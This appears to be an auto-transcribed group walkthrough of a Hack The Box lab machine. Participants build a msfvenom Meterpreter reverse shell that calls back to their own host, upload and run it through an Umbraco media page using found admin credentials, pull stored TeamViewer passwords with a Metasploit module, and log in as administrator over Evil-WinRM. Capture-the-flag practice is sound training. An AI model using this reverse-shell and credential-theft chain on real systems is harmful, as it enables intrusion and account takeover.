Okay, wait, never mind. Okay, we're good. We're recording. Hello, everybody. We're doing remote root. Daniel's going to walk us through it.
Okay, so I got up to just a certain point, okay? I didn't get the whole thing, but essentially, yeah, okay, well, this is fucked. All right, so last week we got the exploit where we were able to run this command, essentially get RCE. I can't remember which part we exploited here, but we were able to get RCE on. Oh,
we uploaded. Oh, never mind.
No, this wasn't it. So
that was before
from this command, yeah. So from this command, we're gonna want to upload an interpreter shell, which we can do through Umbraco, the website they have.
Umbraco, I think.
Umbraco, okay. 10.180. So let's go there.
All right.
So let's see if we can ping this bad boy first.
What's the IP? 180?
80.
Umbraco/media.
What's it spell like that? Yes, it was. All right. So the username was admin, right? And then the password was bacon and cheese.
It was admin at hcb.local, and then bacon and cheese.
Oh yeah. Bacon and cheese. Okay, well that loads. Well, so I found this article on how to create MSF Venom interpreter shell for Windows, and the command that we're gonna type is this one. Because we're gonna want to upload an interpreter shell. We want to do MSF Venom -p Windows interpreter reverse TCP, and then for L host we want to. That's your local host. So for me it would be like 10.10.14.37, I think, and then L port, whatever port you want to listen to, what you want to listen on. So you could do like, I don't know, port 8000, but pick a different port because that's the part I'm going to pick. And then -F to make it format executable, and then you just want to name it whatever you want. So that's the command we're going to want to run. All right, sweet. So on this side,
are we running that on the box?
Yeah, you're running that on the box, yeah. And then that should get
that's
you
that
something.
Python command, right?
Wait, no, not on the box. You do it on the Kali.
Yeah, on the Kali box. That's what I'm going to say. Yeah. So you want to run this in your local computer. What MSF Venom does, essentially, it creates exploits for you, like shells, like reverse shells.
Not exploits.
Shells,
payloads.
Payloads, yeah, like bind shells, stuff like that.
But we're doing it with that long Python 3 exploit thing, right?
No. Then, so you want,
okay, I'm missing something.
So what you want to do is, maybe I didn't explain this correctly. We want to create first a payload. You know how we were using before the netcat shell?
Yeah.
Essentially, this is going to replace that, because what this does is we're going to create reverse shell that's a interpreter shell instead of netcat.
Yeah.
And this is what we're going to upload on the website to then be able to run that and then have a interpreter shell available to us.
Okay, so we're just running this on our local machine right now.
On our local machine, yeah, to create this shell.exe.
Cool. It's the Windows reverse TCP. Oh, the Windows interpreter reverse TCP.
Yeah, so it was like MSF Venom.
Yeah.
I already ran it, so I don't know if you guys want me to run it again, but I could.
I can't connect to my box for some reason, so I'm troubleshooting that.
I can wait.
Yeah, give me 1 second. I went to the article, so I'm just copying it from there now.
Yeah, no worries. No. There's no rush.
So I need my local IP.
We'll wait for you, John, if you want to pause the video.
You can go ahead. I think I understand basically what we're going to do.
local port. Okay, I'm gonna try to run it. Is it supposed to hang?
It's supposed to hang for a little bit. It's creating the payload.
Okay.
So I'm gonna do port 8,000. I'll do
No
8,000.
platform was selected. No arch selected.
It'll auto-select it for you.
Yeah.
Okay, it says final size of exe 73,000 bytes. Let me know what yours is.
That sounds good.
Yeah. Okay, great. Yeah, that's what I have.
All right, sweet. Yeah. It's the same IP. I got the IP right. Okay, cool. So now, do you want us to wait for you, John?
I'm pretty much where you guys are at. I'm making my payload right now.
Okay. We'll wait.
Okay, my payload's created.
All right, sweet. So then the next thing we're gonna do is we're gonna go back to the website where we have
The media
file
page.
upload. Yeah, the media page. Where is that? There it is. And we want to upload that script on there. File.
Oh, because it was just created, or what?
Because what?
Where is it? Was it just created? Is that what we just did?
Yeah, we just created a shell.exe.
Okay.
Yeah. Oh, it's sent home. That's what it is. Sent home. Hackthebox. Oh, right. Hackthebox isn't loaded.
Damn.
Okay.
Okay, I found it.
All right. Because we're having technical issues here with Hackthebox. Let's copy this to desktop.
I think mine just uploaded.
All right. Lit. So now it should be in desktop. Yeah. Shell.exe. Open. You need to put in the name. So we're going to call it shell. Let's call it not shell to make it not suspicious.
Mine doesn't have a save button, my website.
Really?
Yeah.
It's not on the bottom right?
This happened last time too. Yeah, there's just none. I don't know why.
But
But it
it's
was working
uploading,
last
right?
time. Yeah.
Okay, that's good. All right, so now we know that it's in media 1033 shell.exe. And if we go back, now we want to run this shell. Oh, wait, the next thing we want to do is now, so what this is going to do, it's going to connect back to us on Interpreter, but we need to have something that's listening. So we need to create, just like we did last week, we need to create a netcat listener, but with an interpreter now, with like MSF console. So now we want to start MSF console up.
Okay.
And stop me if this isn't making sense. This is my first time doing the running through the box for other people. Nice. Is everyone here?
Yeah.
All right. So now to get a handler, which is what MSF console calls like the listeners that they have essentially, you want to do type use multi.
It's use exploit handler, I think. I think it's exploit multi-handler, isn't it?
Yeah. Well, I just
okay.
type use multi-handler, multi/handler, and it works. So
cool.
I don't know. Maybe it's the other way too.
Worked for me.
Yeah. So then the next thing we want to do is we created a Windows interpreter reverse TCP exploit on MSF console. So now we want to set that to the payload. So set payload reverse. Oh, sorry, Windows. The first thing is Windows/interpreter/reverse TCP. Set that as the payload. Now you want to show info, show options. Okay, L port set to 444. We want to change that to set L port. I put 1001, I think. Hopefully, set host to 10.10.14.37. And now I was having a lot of trouble that it was not setting these correctly for some reason when I typed them. I don't know what it was, but it was changing my local host to a different interface IP than the one I have here. But I guess this time it's working correctly, so that's great. So then we want to start this with, oh, there's one thing we also want to do that I forgot. It's called, let's see if it shows here. I typed this command probably a while back, so. Oh yeah, there it is. Set exit on session equal to false. Essentially, that means that it will just, if I remember correctly, it's just gonna run in the background. No, it's not gonna run in the background. It's gonna not kill it if it doesn't get an immediate connection. It's just gonna keep listening, like constantly listening. So type the command set exit on session false. And then after that, you want to type exploit -j to run this exploit and have it running in the background. All right, sweet. So make sure it's running on the correct IP on the correct port, and then now this handler is listening in the background, which is exactly what we want. Oh, we don't actually want to switch that. Now we go back to our original exploit that runs where we have RCE, and we want to now run that shell. I think mine was in 33, media 33/shell. Or actually, let's ls here first. And I'll give you guys a second to type this because I know
I gotta find mine first because it kept changing the thing.
Yeah, no worries. The path is inet pub, by the way, www.
All right, so then you just literally put in the path of the exe and then it runs?
Yeah, and then it runs.
Okay, I think I found it.
This part actually took me so damn long because I didn't realize for some reason it was changing. It wasn't using my correct interface. It was using like a different IP, and it was just not connecting. And I was like, why isn't this connecting?
So I ran it, and now it says interpreter session 1 opened.
Sweet. So that's exactly what we want. So that means you landed the exploit. I haven't ran it yet, so I'm running it right now. I was waiting for you guys. John, are you there too?
Yep.
All right, lit. Okay, so now we want to type sessions.
Oh, wait, mine killed it. Hold on. I definitely.
Did you type set exit on session false?
Yeah.
Okay.
Hold on. It's still running. I don't know what I did though.
Wait, type sessions and see if it's on. Like if you see like I did, like just because it said set, because remember we put the listener in the background, so you're not automatically gonna pop into it.
Yeah, it's there. It has the same thing as yours.
Okay, perfect. So if you have that, then you want to. The reason why I did that was just showing you like what was happening in the background, but it's not. You weren't actually in the interpreter. So you want to type to go into it. To see those current sessions you have, you want to type sessions, and to go into, you want to type sessions, which I spelled incorrectly, -I, and then the number.
I think I got the password.
Well, we have a.
Yeah, I got that. Okay.
This guy, who does he think he is? Just kidding. All right, so to catch up to John, now that we have the session, we wanted to, find what's vulnerable, and the way we do that is, we want to run netstat and TP to see what current services are running. We saw that TeamViewer was the only one that could possibly, just to like give a background explanation of why I decided to do this. TeamViewer was one that was possibly like malicious because everything else seems like pretty normal. And then I also tried a bunch of other shit that didn't work, like tried looking at other services that had like maybe incorrect paths, stuff like that. So I went the TeamViewer route and I did a little research on TeamViewer and this background, this session, you don't want to kill this, by the way, Brandon. You want to BG for background.
Okay.
So then we want to, since we updated our Metasploit console to have the current exploits, you want to do search, TeamViewer. And then there you go. Yeah, there's a TeamViewer password. So you want to do like, what was it? Set payload or use one, right? Use 0. And then want to show info.
What is U0? Oh, never mind. Yeah, that's the exploit.
It's just picking the current exploit, yeah. So then what you have, the only thing you need for this exploit, which is very convenient, is that you only have to, you have to have a current session running, and then you just have to set it. So what you want to do is set session equal to 1. And then you type exploit whenever you're ready. I also recommend reading, if you have time, the Why Not Security blog post that's here. It's really good, which basically explains how he like set through this thing to land this exploit. It's like really, really good. He like reverse engineered TeamViewer, and like he basically found out that TeamViewer was not properly storing passwords. It's like, it's crazy.
Yeah, that was the exploit that I was trying to get to work on with the GitHub one. But obviously, if there's already an Metasploit module for it, it's a lot easier to use.
Yeah, so I was trying that GitHub one. I think it was in Python, right, or something like that. And there's Python's not in the box, so
they also had an exe version
to run
but
that
I
exploit,
couldn't compile it.
Yeah, I was having too much trouble. So, and then I found some guy was like, I'm like, hey, like I can't run these Python exploits. He's like, well, there's an easy button. So then I was like, he's like, have you tried updating your MSF console? And I was like, I'll do that. Thank you to whoever helped me out on shout out to that guy on the Hackthebox Discord. But okay, so then I got this password called remote, and this is where I got stuck. I'm not sure what to do with this. I looked back at the nmap scan. I couldn't figure out anything on there that would help me.
We don't know what user this is for. Is that the problem?
No. Yeah. Well, you can see the users because if you go back to the session, so you do like session -i 1, and you type shell to go into the shell. You can do net user. Yeah, if you just type net user, you can see the current users.
So have you tried it with all of those?
Yeah. So what I did was I typed net user, and then I do like administrator, and then I did the passwords for all of them, and that didn't work. Yeah, access denied.
Is that the way to switch users though?
I think so.
Because I'm seeing a lot of run as here, and run as lets you enter a password, but I can't enter it because like it like exits out of the prompt before I can enter it because I guess it's just because of how the shell works.
I'm gonna look up run as. If you want to pause it while we try to figure this out, so that way there's not like 5,000 hours of video.
That's true. Yeah, I'll pause it right now.
Thanks, Daniel.
Okay, Daniel, do you want to describe how to get root for the
My
people
thing's
listening?
not on anymore.
Oh, Brandon, can you do it? Because I'm using a different computer for my.
Hold on, let me actually put in my thing real quick.
I can go back on. I can get up and do it real quick. Like,
Wait, what's
easier. 0? What does nmap usually scan? Oh, it doesn't scan it.
It scans the top 1,000 most common ports. You know, you would think even WinRM would be part of it, but who knows? Closing all these beautiful tabs feels so good.
Wow, I can't believe.
So how come it worked with Evil WinRM, but it didn't work when I tried to do net user?
And that's what I'm wondering too, because I was using the Metasploit module called Run As, where it's like you can run commands as a user and you give it the username and password, and it was telling me the creds were wrong every time. Yeah, I don't know. It could be that. No, I have no clue. I'm at a loss for words. Like I thought maybe like even when we use different credentials, but like no, it's the same credentials.
Yeah.
Yeah, I don't know. That's one for the Windows gods. Do you want to show it, Daniel or Brandon or whoever's?
Oh yeah. Let me.
Just so we can wrap the meeting up.
The evil went around.
Yeah. I got a steak waiting for me.
So you can see here, I scanned port 5985, which showed us that WSMan, and that port was open, which meant that we were able to use WinRM. So then I just did evil WinRM, specified the IP and the user, put in the password that we found from the Meterpreter shell, which was the TeamViewer exploit, and then use that to log in, and that was it. Keep forgetting where it is.
Thank you, Brandon, for going over that. Yeah, that's basically it for the root part. The tough part, I guess, was extracting the password from TeamViewer, and then from there, it was just us being really dumb and not trying the obvious stuff.
Spending an hour, not trying like the most obvious thing.
You hate to see it. You hate to see it, to be honest.
Part of the process.
What box do you guys want to do next week?
How about the easy Linux box?
Traceback?
Yeah, have you done it?
I have not. If someone wants to do it, because I have exams coming up on Wednesday, so I don't know how much time I'm gonna have to have.
I can probably knock it out. Traceback.
Traceback.
At least
Yeah.
I'll get used to it. Yeah.
It's the new box.
Cool. So Daniel's gonna be presenting next week on Traceback. Cool.
All right. Best of luck.
All right. Send me the thing so I can post it.
Here.